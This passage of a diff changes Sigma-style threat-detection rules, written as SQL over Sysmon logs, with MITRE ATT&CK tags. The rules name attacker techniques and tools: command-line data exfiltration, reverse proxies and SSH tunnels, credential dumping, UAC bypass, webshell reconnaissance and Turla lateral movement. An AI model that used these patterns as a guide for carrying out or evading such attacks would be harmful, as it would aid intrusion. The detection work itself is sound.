"attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' 
AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' 
ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel 
port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": 
"4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Administrative activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1218", + "attack.execution" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR 
(ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Legitimate usage of stordiag.exe." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects a suspicious script executions in temporary folders or folders accessible 
by environment variables", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", - "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor 
(WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in 
order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "status": "test", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1053.005" + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR 
CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + 